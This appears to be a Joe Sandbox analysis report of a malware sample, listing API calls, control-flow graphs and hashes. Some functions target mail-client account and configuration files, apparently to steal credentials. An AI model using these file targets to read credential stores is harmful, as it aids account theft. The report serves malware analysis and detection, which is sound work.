                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcProtectVirtual
                              • String ID:
                              • API String ID: 2099061454-0
                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                              • Instruction ID: 05c3c06a67c00a1724dfd514c13b74dde664eebdc87b1f74b2a5aa1d6784697e
                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                              • Instruction Fuzzy Hash: 31214B6550CB816FF7118B744D04FE67FEAAB132B8F190696D080CB143D7A88845C3F2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 107 351ec803-351ec80b GetProcAddress 108 351ec82d 107->108 109 351ec80d-351ec81a VirtualProtect 107->109 110 351ec82f-351ec833 108->110 111 351ec82c 109->111 112 351ec81c-351ec82a VirtualProtect 109->112 113 351ec835-351ec83d GetModuleHandleA 110->113 114 351ec872 call 351ec877 110->114 111->108 112->111 115 351ec83f-351ec847 113->115 115->115 117 351ec849-351ec84c 115->117 117->110 118 351ec84e-351ec850 117->118 119 351ec856-351ec85e 118->119 120 351ec852-351ec854 118->120 121 351ec85f-351ec865 GetProcAddress 119->121 120->121 124 351ec866-351ec86e 121->124 126 351ec870 124->126 126->117
                              APIs
                              • GetProcAddress.KERNEL32(00000000,351EC7F4), ref: 351EC804
                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,351EC7F4,351EC7DD), ref: 351EC816
                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,351EC7F4,351EC7DD), ref: 351EC82A
                              • GetModuleHandleA.KERNEL32(?,351EC7DD), ref: 351EC838
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 351EC860
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProcProtectVirtual$HandleModule
                              • String ID:
                              • API String ID: 2152742572-0
                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                              • Instruction ID: 8cd9ae61435b3d3cf83d1f126e93d94f7276f61ed1f4377958be08a85f32aac7
                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                              • Instruction Fuzzy Hash: CDF08B84649F403CFA2141B40E40EFB5FDE9B276ACB140B16F044C7183CAD08906C3F2
                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 351E2645
                              • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 351E2710
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 351E2730
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 351E273A
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                              • String ID:
                              • API String ID: 254469556-0
                              • Opcode ID: f2efa829f7e292b0b96adcfd5206a2b9c62b6edaa526a7b990c9e391a8190234
                              • Instruction ID: 5d39092b681d0cb0afe42881050197b992e6c70b5f4a58cfff74b11f996b5f85
                              • Opcode Fuzzy Hash: f2efa829f7e292b0b96adcfd5206a2b9c62b6edaa526a7b990c9e391a8190234
                              • Instruction Fuzzy Hash: B2312975D552189BDB11DFA4D989BCDFBB8BF08300F1041AAE40CAB250EBB19A85CF45
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 351E2276
                              • GetCurrentThreadId.KERNEL32 ref: 351E2285
                              • GetCurrentProcessId.KERNEL32 ref: 351E228E
                              • QueryPerformanceCounter.KERNEL32(?), ref: 351E229B
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 2933794660-0
                              • Opcode ID: a8b1369dfa74e631ba6985e668b26f3b9228e35c523cff11c24032751330d95a
                              • Instruction ID: d6b6fcf9c84ee23af7e0b7c9aaaf743b3a13d92d0d81a20efe2f419a58a7d0ca
                              • Opcode Fuzzy Hash: a8b1369dfa74e631ba6985e668b26f3b9228e35c523cff11c24032751330d95a
                              • Instruction Fuzzy Hash: 24F0AF70C20208EBDB01DBF0C549A9EBBF8FF08305F9244999402F7140EB34AB168B50
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,351E2C3B,351ED1DC,00000017), ref: 351E2B21
                              • UnhandledExceptionFilter.KERNEL32(351ED1DC,?,351E2C3B,351ED1DC,00000017), ref: 351E2B2A
                              • GetCurrentProcess.KERNEL32(C0000409,?,351E2C3B,351ED1DC,00000017), ref: 351E2B35
                              • TerminateProcess.KERNEL32(00000000,?,351E2C3B,351ED1DC,00000017), ref: 351E2B3C
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                              • String ID:
                              • API String ID: 3231755760-0
                              • Opcode ID: 2af5e7fa22d10620ba2da5667483dbfa388cd70e845716398972a9ff99bc511b
                              • Instruction ID: 40b5a4444681494e5164351307797adbfdaa35490af9ab87531b6d0dc653bfeb
                              • Opcode Fuzzy Hash: 2af5e7fa22d10620ba2da5667483dbfa388cd70e845716398972a9ff99bc511b
                              • Instruction Fuzzy Hash: 24D01231034204AFE7022BE0ED0CA593F28EB04222FCA0008F709A64C0CF318423CB51
                              APIs
                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 351E61DA
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 351E61E4
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 351E61F1
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: 029b83ce842f83cfa770fc83edcd0cbd0d2cac0cd56092627c649e5af5f1ffff
                              • Instruction ID: 8c29da93d19a8c3788e14bf8c15cd3ea629c067144b63355a32e68f14266dde9
                              • Opcode Fuzzy Hash: 029b83ce842f83cfa770fc83edcd0cbd0d2cac0cd56092627c649e5af5f1ffff
                              • Instruction Fuzzy Hash: FF31E57491121C9BCB61DF64D988B8DBBB9BF08310F5041DAE81CA7290EB709F918F45
                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,351E4A8A,?,351F2238,0000000C,351E4BBD,00000000,00000000,00000001,351E2082,351F2108,0000000C,351E1F3A,?), ref: 351E4AD5
                              • TerminateProcess.KERNEL32(00000000,?,351E4A8A,?,351F2238,0000000C,351E4BBD,00000000,00000000,00000001,351E2082,351F2108,0000000C,351E1F3A,?), ref: 351E4ADC
                              • ExitProcess.KERNEL32 ref: 351E4AEE
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: 67ca1a4093acb71f1f0536be1fe4103b4ae830c98a6ebbd7c4e33a708484cac0
                              • Instruction ID: 4cb3ccfd9cbfd85fab56ff166bd4f1440020efbae924d956e1f91000de2e29d8
                              • Opcode Fuzzy Hash: 67ca1a4093acb71f1f0536be1fe4103b4ae830c98a6ebbd7c4e33a708484cac0
                              • Instruction Fuzzy Hash: BDE04636020A08AFDF02AFA4DD08A493B2AFF40391B914018F9169B462DB76D893DB84
                              APIs
                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 351E294C
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: FeaturePresentProcessor
                              • String ID:
                              • API String ID: 2325560087-0
                              • Opcode ID: da21e1a7b790b3c85a27ca2cd77e32254118c22f19c96764f57efb0077658033
                              • Instruction ID: 410deb39f2ca8e7c65276f87370f9170cfd44721c587793998a7b648bef9a65f
                              • Opcode Fuzzy Hash: da21e1a7b790b3c85a27ca2cd77e32254118c22f19c96764f57efb0077658033
                              • Instruction Fuzzy Hash: 3D41ACB19156048BEB24CF64E4C2A9EFBF4FB48300F20866AD416FB394D7749A41CB60
                              APIs
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: HeapProcess
                              • String ID:
                              • API String ID: 54951025-0
                              • Opcode ID: e9003e3f4da523f862eb459b16b0ece1ec516b561914a7a567ec87c443de479d
                              • Instruction ID: 3fb6315d872ce5d0bdacf7e22ef1829e0e9e8bd4a5d77feaae236589eb0c4f8e
                              • Opcode Fuzzy Hash: e9003e3f4da523f862eb459b16b0ece1ec516b561914a7a567ec87c443de479d
                              • Instruction Fuzzy Hash: 7EA012302211028F63104E30560920C35AC650019030501585409D0080EF24C0624701

                              Control-flow Graph

                              APIs
                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 351E1D1B
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 351E1D37
                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 351E1D4B
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 351E1D58
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 351E1D72
                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 351E1D7D
                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 351E1D8A
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                              • String ID:
                              • API String ID: 1454806937-0
                              • Opcode ID: e0b92dc42eddd7ddfde9ab060ac8dff99c1ea8d2eb8bf3a4254c85f790344031
                              • Instruction ID: 6bcb9e5b007fdbce52b825d7279fbaf72ffc5cbddfb44a0faba43c44fddea16f
                              • Opcode Fuzzy Hash: e0b92dc42eddd7ddfde9ab060ac8dff99c1ea8d2eb8bf3a4254c85f790344031
                              • Instruction Fuzzy Hash: EB218EB595161CBFE711DBA09C8CEEBB6BCFB08744F4509A9F501E2181DBB08E468B70

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 224 351e39be-351e39c8 225 351e3a6e-351e3a71 224->225 226 351e39cd-351e39dd 225->226 227 351e3a77 225->227 228 351e39df-351e39e2 226->228 229 351e39ea-351e3a03 LoadLibraryExW 226->229 230 351e3a79-351e3a7d 227->230 231 351e3a6b 228->231 232 351e39e8 228->232 233 351e3a55-351e3a5e 229->233 234 351e3a05-351e3a0e GetLastError 229->234 231->225 235 351e3a67-351e3a69 232->235 233->235 238 351e3a60-351e3a61 FreeLibrary 233->238 236 351e3a45 234->236 237 351e3a10-351e3a22 call 351e55f6 234->237 235->231 239 351e3a7e-351e3a80 235->239 241 351e3a47-351e3a49 236->241 237->236 244 351e3a24-351e3a36 call 351e55f6 237->244 238->235 239->230 241->233 243 351e3a4b-351e3a53 241->243 243->231 244->236 247 351e3a38-351e3a43 LoadLibraryExW 244->247 247->241
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              • Opcode ID: 5bd93f3bd6f0af13ced4d83432d6282a570d280ca5571f0797fa26be71ca9c93
                              • Instruction ID: 2b2b133ae56ec0653134e6217cc4a7de54ebf47d583ef182d34f76f9ff4d7f8a
                              • Opcode Fuzzy Hash: 5bd93f3bd6f0af13ced4d83432d6282a570d280ca5571f0797fa26be71ca9c93
                              • Instruction Fuzzy Hash: 1811EB76A15F11BBE722D6649C86E0A37696F807A0F021114E917FB1C0DF70F941C7E1

                              Control-flow Graph

                              APIs
                              • lstrcatW.KERNEL32(?,?), ref: 351E1038
                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 351E104B
                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 351E1061
                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 351E1075
                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 351E1090
                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 351E10B8
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: lstrlen$AttributesFilelstrcat
                              • String ID:
                              • API String ID: 3594823470-0
                              • Opcode ID: 7fe49dabd508faa918a233cbf39a9e6f2bd9e9b07ba26960c512d0acc957b5b7
                              • Instruction ID: 0999203b1003169b96381178da2163e8238b8367ab96506aae851fa600b36d81
                              • Opcode Fuzzy Hash: 7fe49dabd508faa918a233cbf39a9e6f2bd9e9b07ba26960c512d0acc957b5b7
                              • Instruction Fuzzy Hash: D321B5759007589BDF51DBA0DC48DDFB779EF44324F104656E855931A2DF309A86CF40

                              Control-flow Graph

                              APIs
                                • Part of subcall function 351E1E89: lstrlenW.KERNEL32(?,?,?,?,?,351E10DF,?,?,?,00000000), ref: 351E1E9A
                                • Part of subcall function 351E1E89: lstrcatW.KERNEL32(?,?), ref: 351E1EAC
                                • Part of subcall function 351E1E89: lstrlenW.KERNEL32(?,?,351E10DF,?,?,?,00000000), ref: 351E1EB3
                                • Part of subcall function 351E1E89: lstrlenW.KERNEL32(?,?,351E10DF,?,?,?,00000000), ref: 351E1EC8
                                • Part of subcall function 351E1E89: lstrcatW.KERNEL32(?,351E10DF), ref: 351E1ED3
                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 351E122A
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: lstrlen$lstrcat$AttributesFile
                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                              • API String ID: 1475205934-1520055953
                              • Opcode ID: d9cd907a34a5828c9435004300a9d074c3839c211e788a231d73b89f3665ecc1
                              • Instruction ID: cc0a9d96183a6d5192cec15d25b1186307a6b6ea522255e5154ad7517f432ff0
                              • Opcode Fuzzy Hash: d9cd907a34a5828c9435004300a9d074c3839c211e788a231d73b89f3665ecc1
                              • Instruction Fuzzy Hash: 8921E979E906486AE710D7D0EC91FEDB33AEF80714F100546F605EB1D1E6B11D818758

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 288 351e4b39-351e4b61 GetModuleHandleExW 289 351e4b86-351e4b8a 288->289 290 351e4b63-351e4b76 GetProcAddress 288->290 293 351e4b8c-351e4b8f FreeLibrary 289->293 294 351e4b95-351e4ba2 call 351e2ada 289->294 291 351e4b78-351e4b83 290->291 292 351e4b85 290->292 291->292 292->289 293->294
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,351E4AEA,?,?,351E4A8A,?,351F2238,0000000C,351E4BBD,00000000,00000000), ref: 351E4B59
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 351E4B6C
                              • FreeLibrary.KERNEL32(00000000,?,?,?,351E4AEA,?,?,351E4A8A,?,351F2238,0000000C,351E4BBD,00000000,00000000,00000001,351E2082), ref: 351E4B8F
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 90cbf4204134cb658ccde52cb7d8aba297e3721d842dc32eadfc136b2a5aeb44
                              • Instruction ID: 372949fa0052642971a9a8a2c2e7875d0b14ecafe620d614a76b71e5cc68c94a
                              • Opcode Fuzzy Hash: 90cbf4204134cb658ccde52cb7d8aba297e3721d842dc32eadfc136b2a5aeb44
                              • Instruction Fuzzy Hash: 4BF0C275920508BFEB129F90DC48F9EBFB9EF48351F4201A8F906B6180DF318A52DB91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 298 351e9492-351e94ef GetConsoleCP 299 351e94f5-351e9511 298->299 300 351e9632-351e9644 call 351e2ada 298->300 301 351e952c-351e953d call 351e7c19 299->301 302 351e9513-351e952a 299->302 309 351e953f-351e9542 301->309 310 351e9563-351e9565 301->310 304 351e9566-351e9575 call 351e79e6 302->304 304->300 314 351e957b-351e959b WideCharToMultiByte 304->314 312 351e9548-351e955a call 351e79e6 309->312 313 351e9609-351e9628 309->313 310->304 312->300 321 351e9560-351e9561 312->321 313->300 314->300 316 351e95a1-351e95b7 WriteFile 314->316 317 351e962a-351e9630 GetLastError 316->317 318 351e95b9-351e95ca 316->318 317->300 318->300 320 351e95cc-351e95d0 318->320 322 351e95fe-351e9601 320->322 323 351e95d2-351e95f0 WriteFile 320->323 321->314 322->299 325 351e9607 322->325 323->317 324 351e95f2-351e95f6 323->324 324->300 326 351e95f8-351e95fb 324->326 325->300 326->322
                              APIs
                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,351E9C07,?,00000000,?,00000000,00000000), ref: 351E94D4
                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 351E9590
                              • WriteFile.KERNEL32(?,?,00000000,351E9C07,00000000,?,?,?,?,?,?,?,?,?,351E9C07,?), ref: 351E95AF
                              • WriteFile.KERNEL32(?,?,00000001,351E9C07,00000000,?,?,?,?,?,?,?,?,?,351E9C07,?), ref: 351E95E8
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: FileWrite$ByteCharConsoleMultiWide
                              • String ID:
                              • API String ID: 977765425-0
                              • Opcode ID: 51e588f1e83e5406ec618c5f019bc789dac063785e434b4cb635f10241bdcdb7
                              • Instruction ID: 772f26730211dda8bebde29b29514560bd927b0c9d62df8e7d7009540925af91
                              • Opcode Fuzzy Hash: 51e588f1e83e5406ec618c5f019bc789dac063785e434b4cb635f10241bdcdb7
                              • Instruction Fuzzy Hash: 8451D2B1A10609AFDB10CFA4D895ADEBBF8FF49300F14415AE591E7281DB709952CB61

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 327 351e1e89-351e1ec0 lstrlenW call 351e2c40 lstrcatW lstrlenW 330 351e1ec2-351e1ec5 327->330 331 351e1ed1-351e1edd lstrcatW 327->331 330->331 332 351e1ec7-351e1ecd lstrlenW 330->332 332->331
                              APIs
                              • lstrlenW.KERNEL32(?,?,?,?,?,351E10DF,?,?,?,00000000), ref: 351E1E9A
                              • lstrcatW.KERNEL32(?,?), ref: 351E1EAC
                              • lstrlenW.KERNEL32(?,?,351E10DF,?,?,?,00000000), ref: 351E1EB3
                              • lstrlenW.KERNEL32(?,?,351E10DF,?,?,?,00000000), ref: 351E1EC8
                              • lstrcatW.KERNEL32(?,351E10DF), ref: 351E1ED3
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: lstrlen$lstrcat
                              • String ID:
                              • API String ID: 493641738-0
                              • Opcode ID: bbfeddb7298e4df07342fdd15340d8cd79774c639614d908b11da7af63ed3d69
                              • Instruction ID: 318e020221fdaa3885dbfc6f49761923f190c1de1bbf2ef672ad22a082b2139b
                              • Opcode Fuzzy Hash: bbfeddb7298e4df07342fdd15340d8cd79774c639614d908b11da7af63ed3d69
                              • Instruction Fuzzy Hash: 99F082361506107AE622276AAC85EBFBB7CFFC6B60F84041DFA0893190DB54595393B5

                              Control-flow Graph

                              APIs
                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,351E190E,?,?,00000000,?,00000000), ref: 351E1643
                              • lstrcatW.KERNEL32(?,?), ref: 351E165A
                              • lstrlenW.KERNEL32(?,?,?,?,?,351E190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 351E1661
                              • lstrcatW.KERNEL32(00001008,?), ref: 351E1686
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: lstrcatlstrlen
                              • String ID:
                              • API String ID: 1475610065-0
                              • Opcode ID: d7eaa51db0ae4125f7b494b36e85c81c6fb41aabad7b6f9578a21e4a40827240
                              • Instruction ID: 95c300ad757763e8839cb0f1d64435af587d61ed0371bb8df799faadac6eefbf
                              • Opcode Fuzzy Hash: d7eaa51db0ae4125f7b494b36e85c81c6fb41aabad7b6f9578a21e4a40827240
                              • Instruction Fuzzy Hash: C021DA36B00604ABD705DB94DC80EEEB7BAEF88714F14441AE504FB181EF74AA42D7A5
                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 351E715C
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 351E717F
                                • Part of subcall function 351E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 351E5702
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 351E71A5
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 351E71C7
                              Memory Dump Source
                              • Source File: 00000007.00000002.183103032294.00000000351E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 351E0000, based on PE: true
                              • Associated: 00000007.00000002.183102995632.00000000351E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000007.00000002.183103032294.00000000351F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_351e0000_Vexploio.jbxd
                              Similarity
                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                              • String ID:
                              • API String ID: 1794362364-0
                              • Opcode ID: e29046b21f7cb8eb6c97a1289776db29aff4bf929880d2ec33fe31be3eb6e686
                              • Instruction ID: 70711aae0cf4a44360f7fb586af6fda1fbaf4f9a9d378b57ea558700b1a69c47
                              • Opcode Fuzzy Hash: e29046b21f7cb8eb6c97a1289776db29aff4bf929880d2ec33fe31be3eb6e686
                              • Instruction Fuzzy Hash: 9701D8B7615B55BB37161BF65C88D7B2A6EEAC29A0356012DBC07D7240DF618C0282B0
                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,351E1D66,00000000,00000000,?,351E5C88,351E1D66,00000000,00000000,00000000,?,351E5E85,00000006,FlsSetValue), ref: 351E5D13
                              • GetLastError.KERNEL32(?,351E5C88,351E1D66,00000000,00000000,00000000,?,351E5E85,00000006,FlsSetValue,351EE190,FlsSetValue,00000000,00000364,?,351E5BC8), ref: 351E5D1F
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,351E5C88,351E1D66,00000000,00000000,00000000,?,351E5E85,00000006,FlsSetValue,351EE190,FlsSetValue,00000000), ref: 351E5D2D
                              Memory Dump Source
